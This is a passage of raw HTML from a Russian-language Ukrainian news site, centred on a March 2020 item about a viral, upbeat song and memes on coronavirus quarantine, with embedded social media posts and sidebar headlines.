class="postDate">12:36</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1803-eto-vyzov-shmygal-predupredil-o-vozmozhnom-ekonomicheskom-krizise-v-ukraine">"Это вызов": Шмыгаль предупредил о возможном экономическом кризисе в Украине</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798349"> <span class="postDate">12:20</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/1803-kak-mozhet-vyglyadet-tesla-cybertruck-dlya-policii-i-skoroj-pomoshhi-foto">Как может выглядеть Tesla Cybertruck для полиции и скорой помощи (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798358"> <span class="postDate">12:16</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1803-amerikanskie-eksperty-vystupili-protiv-naznacheniya-venediktovoj-genprokurorom">Американские эксперты выступили против назначения Венедиктовой генпрокурором</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798356"> <span class="postDate">12:14</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1803-v-kievskoj-oblasti-vveli-rezhim-chp">В Киевской области ввели режим ЧП</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798344"> <span class="postDate">11:31</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1803-rossmi-vydali-perl-o-zakrytii-lvovskogo-metro-i-poluchili-otvet-ot-prituly">РосСМИ выдали "перл" о закрытии львовского метро и получили ответ от Притулы</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798341"> <span class="postDate">10:52</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1803-preparat-ot-malyarii-pokazal-effektivnost-v-lechenii-pnevmonii-pri-koronaviruse">Препарат от малярии показал эффективность в лечении пневмонии при коронавирусе</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798339"> <span class="postDate">10:32</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1803-pochemu-putin-na-samom-dele-tak-toropitsya-s-konstituciej-portnikov">Почему Путин на самом деле так торопится с конституцией, - Портников</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798337"> <span class="postDate">10:10</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1803-koronakrizis-platezhnyj-balans-ukrainy-mozhet-dazhe-vyigrat">Коронакризис: Платежный баланс Украины может даже выиграть</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798336"> <span class="postDate">10:06</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/1803-v-kieve-razreshili-poka-chto-ne-platit-za-internet">В Киеве разрешили пока что не платить за интернет</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798335"> <span class="postDate">09:59</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1803-v-ukraine-budut-tshhatelno-sledit-za-cenami-v-supermarketax-i-nalichiem-produktov">В Украине будут тщательно следить за ценами в супермаркетах и наличием продуктов</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a></div><div class="links_bal"></div>  </div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category"><style type="text/css" media="screen">@import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);</style><style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px}</style><div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" > <div itemscope itemtype="https://schema.org/NewsArticle" class="post _ga1_on_" style="margin:0; padding:0; " id="post-4798428"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/news-culture/full/1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set"/><article style="font-size:12pt;"><h1 itemprop="headline" id="postTitle">Без паники: Смешная и оптимистичная песня про ситуацию в коронавирусном мире &#171;взорвала&#187; сеть</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/news-culture">Новости культуры</a> <span>&raquo;</span> Без паники: Смешная и оптимистичная песня про ситуацию в коронавирусном мире "взорвала" сеть</div><time datetime="2020-03-19T07:45:06+02:00"><span id="date">Новости культуры, 07:45:06 </span></time><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews-culture%2Ffull%2F1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews-culture%2Ffull%2F1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span><span class="swp_count">1</span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%91%D0%B5%D0%B7+%D0%BF%D0%B0%D0%BD%D0%B8%D0%BA%D0%B8%3A+%D0%A1%D0%BC%D0%B5%D1%88%D0%BD%D0%B0%D1%8F+%D0%B8+%D0%BE%D0%BF%D1%82%D0%B8%D0%BC%D0%B8%D1%81%D1%82%D0%B8%D1%87%D0%BD%D0%B0%D1%8F+%D0%BF%D0%B5%D1%81%D0%BD%D1%8F+%D0%BF%D1%80%D0%BE+%D1%81%D0%B8%D1%82%D1%83%D0%B0%D1%86%D0%B8%D1%8E+%D0%B2+%D0%BA%D0%BE%D1%80%D0%BE%D0%BD%D0%B0%D0%B2%D0%B8%D1%80%D1%83%D1%81%D0%BD%D0%BE%D0%BC+%D0%BC%D0%B8%D1%80%D0%B5+%22%D0%B2%D0%B7%D0%BE%D1%80%D0%B2%D0%B0%D0%BB%D0%B0%22+%D1%81%D0%B5%D1%82%D1%8C&url=https%3A%2F%2Fenovosty.com%2Fnews-culture%2Ffull%2F1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%91%D0%B5%D0%B7+%D0%BF%D0%B0%D0%BD%D0%B8%D0%BA%D0%B8%3A+%D0%A1%D0%BC%D0%B5%D1%88%D0%BD%D0%B0%D1%8F+%D0%B8+%D0%BE%D0%BF%D1%82%D0%B8%D0%BC%D0%B8%D1%81%D1%82%D0%B8%D1%87%D0%BD%D0%B0%D1%8F+%D0%BF%D0%B5%D1%81%D0%BD%D1%8F+%D0%BF%D1%80%D0%BE+%D1%81%D0%B8%D1%82%D1%83%D0%B0%D1%86%D0%B8%D1%8E+%D0%B2+%D0%BA%D0%BE%D1%80%D0%BE%D0%BD%D0%B0%D0%B2%D0%B8%D1%80%D1%83%D1%81%D0%BD%D0%BE%D0%BC+%D0%BC%D0%B8%D1%80%D0%B5+%22%D0%B2%D0%B7%D0%BE%D1%80%D0%B2%D0%B0%D0%BB%D0%B0%22+%D1%81%D0%B5%D1%82%D1%8C&url=https%3A%2F%2Fenovosty.com%2Fnews-culture%2Ffull%2F1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews-culture%2Ffull%2F1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews-culture%2Ffull%2F1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4798428" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><b><p>Несмотря на сложную ситуацию в мире, люди не теряют оптимизм и чувство юмора. И это главное.</p></b><p>Пользователи соцсетей, сидя дома на карантине, выкладывают в интернет креативные мемы, фотожабы, картинки и видео, информирует <a class="inform" href="https://enovosty.com/news">enovosty.com/news</a>.</p><p>На странице в Facebook появилось забавное видео, которое сразу же стало хитом сети и собрало 15 тысяч лайков.</p><div id="fb-root"></div><p><script async="1" defer="1" crossorigin="anonymous" src="https://connect.facebook.net/fr_FR/sdk.js#xfbml=1&amp;version=v6.0"></script></p><div class="fb-video" data-href="https://www.facebook.com/MarinaKazakova1960/videos/554397775005901/?t=2" data-width="500"><blockquote cite="https://www.facebook.com/MarinaKazakova1960/videos/554397775005901/" class="fb-xfbml-parse-ignore"><p><a rel="nofollow" href="https://www.facebook.com/MarinaKazakova1960/videos/554397775005901/"></a></p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/news_society/full/803-xuzhe-ne-budet-v-seti-poyavilas-metkaya-fotozhaba-na-temu-poiska-ministrov-na-vakantnye-dolzhnosti" >Хуже не будет: в Сети появилась меткая фотожаба на тему поиска министров на вакантные должности</a></p><p>Слушаю по несколько раз в день. Рекомендую!</p><p>Publiée par <a rel="nofollow" href="https://www.facebook.com/MarinaKazakova1960">Марина Казакова</a> sur Jeudi 15 novembre 2018</p></blockquote></div><p>Подборка позитива для поднятия настроения:</p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">actually lol <a rel="nofollow" href="https://t.co/GbDi0qqIVE">pic.twitter.com/GbDi0qqIVE</a></p><p>&mdash; christine teigen (@chrissyteigen) <a rel="nofollow" href="https://twitter.com/chrissyteigen/status/1239991621208301568?ref_src=twsrc%5Etfw">March 17, 2020</a></p></blockquote><p> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">Quarantine day 6. <a rel="nofollow" href="https://t.co/er652Oy3Ki">pic.twitter.com/er652Oy3Ki</a></p><p>&mdash; jamie (@gnuman1979) <a rel="nofollow" href="https://twitter.com/gnuman1979/status/1239523796542992387?ref_src=twsrc%5Etfw">March 16, 2020</a></p></blockquote><p> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p><div id="fb-root"></div><p><script async="1" defer="1" crossorigin="anonymous" src="https://connect.facebook.net/fr_FR/sdk.js#xfbml=1&amp;version=v6.0"></script></p><div class="fb-video" data-href="https://www.facebook.com/angelina.juleva/videos/2630822093683373/?t=5" data-width="500"><blockquote cite="https://www.facebook.com/angelina.juleva/videos/2630822093683373/" class="fb-xfbml-parse-ignore"><p><a rel="nofollow" href="https://www.facebook.com/angelina.juleva/videos/2630822093683373/"></a></p><p>Для тех, кому без спорта тяжко&#8230;Не благодарите! 😂</p><p>Publiée par <a rel="nofollow" href="#" role="button">Angelina Juleva</a> sur Lundi 16 mars 2020</p></blockquote></div><div class="tptn_counter" style="color:white;" id="tptn_counter_4798428"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4798428&amp;_wpnonce=40326b7e36"></script></div><div class="swp-content-locator"></div><br /><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"/> <meta itemprop="width" content="512"> <meta itemprop="height" content="512"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Оксана Ельченко" /></span><meta itemprop="datePublished" content="2020-03-19T07:45:06+02:00"/><meta itemprop="dateModified" content="2020-03-19T08:01:15+02:00"/><meta itemprop="genre" content="Новости культуры"/><meta itemprop="description" content="Несмотря на сложную ситуацию в мире, люди не теряют оптимизм и чувство юмора. И это главное."/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"><span itemprop="image" content="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"><meta itemprop="width" content="512" /><meta itemprop="height" content="512" /> </span></span></div></article></div> <div class="postFooter" style="padding:0;"><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/youtube.jpg"></a><span id="authorName" style="margin-right: 25px;float: left;"><span id="label">Автор: Оксана Ельченко</span></span><div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">ТЕГИ: <a href="https://enovosty.com/tag/kurezy" rel="tag">курьезы</a>, <a href="https://enovosty.com/tag/optimizm" rel="tag">оптимизм</a>, <a href="https://enovosty.com/tag/pozitivnye-video" rel="tag">позитивные видео</a></div><div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 250</div><div class="voteBox" > </div><br /><p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews-culture%2Ffull%2F1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews-culture%2Ffull%2F1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span><span class="swp_count">1</span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%91%D0%B5%D0%B7+%D0%BF%D0%B0%D0%BD%D0%B8%D0%BA%D0%B8%3A+%D0%A1%D0%BC%D0%B5%D1%88%D0%BD%D0%B0%D1%8F+%D0%B8+%D0%BE%D0%BF%D1%82%D0%B8%D0%BC%D0%B8%D1%81%D1%82%D0%B8%D1%87%D0%BD%D0%B0%D1%8F+%D0%BF%D0%B5%D1%81%D0%BD%D1%8F+%D0%BF%D1%80%D0%BE+%D1%81%D0%B8%D1%82%D1%83%D0%B0%D1%86%D0%B8%D1%8E+%D0%B2+%D0%BA%D0%BE%D1%80%D0%BE%D0%BD%D0%B0%D0%B2%D0%B8%D1%80%D1%83%D1%81%D0%BD%D0%BE%D0%BC+%D0%BC%D0%B8%D1%80%D0%B5+%22%D0%B2%D0%B7%D0%BE%D1%80%D0%B2%D0%B0%D0%BB%D0%B0%22+%D1%81%D0%B5%D1%82%D1%8C&url=https%3A%2F%2Fenovosty.com%2Fnews-culture%2Ffull%2F1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%91%D0%B5%D0%B7+%D0%BF%D0%B0%D0%BD%D0%B8%D0%BA%D0%B8%3A+%D0%A1%D0%BC%D0%B5%D1%88%D0%BD%D0%B0%D1%8F+%D0%B8+%D0%BE%D0%BF%D1%82%D0%B8%D0%BC%D0%B8%D1%81%D1%82%D0%B8%D1%87%D0%BD%D0%B0%D1%8F+%D0%BF%D0%B5%D1%81%D0%BD%D1%8F+%D0%BF%D1%80%D0%BE+%D1%81%D0%B8%D1%82%D1%83%D0%B0%D1%86%D0%B8%D1%8E+%D0%B2+%D0%BA%D0%BE%D1%80%D0%BE%D0%BD%D0%B0%D0%B2%D0%B8%D1%80%D1%83%D1%81%D0%BD%D0%BE%D0%BC+%D0%BC%D0%B8%D1%80%D0%B5+%22%D0%B2%D0%B7%D0%BE%D1%80%D0%B2%D0%B0%D0%BB%D0%B0%22+%D1%81%D0%B5%D1%82%D1%8C&url=https%3A%2F%2Fenovosty.com%2Fnews-culture%2Ffull%2F1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews-culture%2Ffull%2F1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews-culture%2Ffull%2F1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4798428" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="c531d3d67e" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script></div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div><br> <div class="mainPageWiget articles" style="overflow:visible;"><p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;"><a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p><hr style="border: 1px solid #000000;"><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4798088"><div class="blockTitle"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/ei_size.gif" /><a class="postTitle" href="https://enovosty.com/markets/full/1603-gibel-bogov">Гибель Богов</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4798062"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/ekonomika/full/1603-mirovoj-ekonomicheskij-shok-iz-za-koronavirusa-posledstviya-dlya-ukrainskoj-ekonomiki">Мировой экономический шок из-за коронавируса: последствия для украинской экономики</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4798021"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/society/full/1603-tochnoe-chislo-zarazhennyx-vakcina-i-karantin-chto-vazhno-znat-o-koronaviruse">Точное число зараженных, вакцина и карантин: Что важно знать о коронавирусе</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4797842"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1403-itogi-dnya-pervaya-smert-ot-koronavirusa-zakrytye-granicy-i">Итоги дня: Первая смерть от коронавируса, закрытые границы и продление санкций</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4797805"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1303-putin-koshhej-bessmertnyj-nashix-dnej">Путин – Кощей Бессмертный наших дней</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4797682"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1203-itogi-dnya-radikalnoe-reshenie-trampa">Итоги дня: Радикальное решение Трампа, новые зараженные и возвращение морозов</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4797567"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1103-itogi-dnya-ukraina-na-karantine-ekonomicheskij-shok-i">Итоги дня: Украина на карантине, экономический шок и разгромный иск против Путина</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4797444"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1003-itogi-dnya-neftyanaya-vojna-spok-panike-i">Итоги дня: Нефтяная война, бой панике и важнейшие доказательсва в Гааге</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4797203"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/603-itogi-dnya-plany-pravitelstva-ekonomicheskij-oblom-i">Итоги дня: Планы правительства, дедлайн по переговорам с Путиным и нефтяное пике</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4797184"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/603-s-gpu-snyali-ryaboshapku-prigotovitsya-nabu-i-sap">С ГПУ сняли Рябошапку. Приготовиться НАБУ и САП?..</a></div><div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div></div></div><br /><div
id='admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069');});</script><div id="pop_video" class="six"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="6"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_incidents/full/1503-kak-tysyachi-ukrainskix-turistov-v-egipte-stali-zalozhnikami-koronavirusa-video"><img width="142" height="88" alt="Как тысячи украинских туристов в Египте стали заложниками коронавируса" src="https://enovosty.com/wp-content/uploads/2020/03/koronavirus-egipet-2.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_incidents/full/1503-kak-tysyachi-ukrainskix-turistov-v-egipte-stali-zalozhnikami-koronavirusa-video">Как тысячи украинских туристов в Египте стали заложниками коронавируса</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_politics/full/1203-ministr-oborony-poyasnil-svoi-skandalnye-slova-o-nato"><img width="142" height="88" alt="Министр обороны пояснил свои скандальные слова о НАТО" src="https://enovosty.com/wp-content/uploads/2020/03/taran1.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_politics/full/1203-ministr-oborony-poyasnil-svoi-skandalnye-slova-o-nato">Министр обороны пояснил свои скандальные слова о НАТО</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_politics/full/1703-stalo-izvestno-kakuyu-voennuyu-pomoshh-poluchit-ukraina-ot-ssha-v-etom-godu"><img width="142" height="88" alt="Стало известно, какую военную помощь получит Украина от США в этом году" src="https://enovosty.com/wp-content/uploads/2020/03/korabli.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_politics/full/1703-stalo-izvestno-kakuyu-voennuyu-pomoshh-poluchit-ukraina-ot-ssha-v-etom-godu">Стало известно, какую военную помощь получит Украина от США в этом году</a></div></td></tr><tr><td class="view"><span><i></i>13730</span></td><td class="view"><span><i></i>3237</span></td><td class="view last"><span><i></i>2177</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/zdorove/full/1703-ukraincy-nachali-zarazhatsya-koronavirusom-vnutri-strany-ne-vyezzhaya-za-granicu-viktor-lyashko-video"><img width="142" height="88" alt="Украинцы начали заражаться коронавирусом внутри страны, не выезжая за границу, - Виктор Ляшко" src="https://enovosty.com/wp-content/uploads/2020/03/lyashko_v.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/zdorove/full/1703-ukraincy-nachali-zarazhatsya-koronavirusom-vnutri-strany-ne-vyezzhaya-za-granicu-viktor-lyashko-video">Украинцы начали заражаться коронавирусом внутри страны, не выезжая за границу, - Виктор Ляшко</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/zdorove/full/1603-koronavirus-v-ukraine-mer-kieva-vitalij-klichko-vvodit-totalnyj-karantin-video"><img width="142" height="88" alt="Коронавирус в Украине: Мэр Киева Виталий Кличко вводит тотальный карантин" src="https://enovosty.com/wp-content/uploads/2020/03/klichko.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/zdorove/full/1603-koronavirus-v-ukraine-mer-kieva-vitalij-klichko-vvodit-totalnyj-karantin-video">Коронавирус в Украине: Мэр Киева Виталий Кличко вводит тотальный карантин</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news-auto/full/1603-samyj-krepkij-land-cruiser-v-mire-v-seti-opublikovali-popytku-utilizacii-vnedorozhnika-video"><img width="142" height="88" alt="Самый крепкий Land Cruiser в мире: в Сети опубликовали попытку утилизации внедорожника" src="https://enovosty.com/wp-content/uploads/2020/03/screenshot_3-4-e1584354743504.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news-auto/full/1603-samyj-krepkij-land-cruiser-v-mire-v-seti-opublikovali-popytku-utilizacii-vnedorozhnika-video">Самый крепкий Land Cruiser в мире: в Сети опубликовали попытку утилизации внедорожника</a></div></td></tr><tr><td class="view"><span><i></i>2153</span></td><td 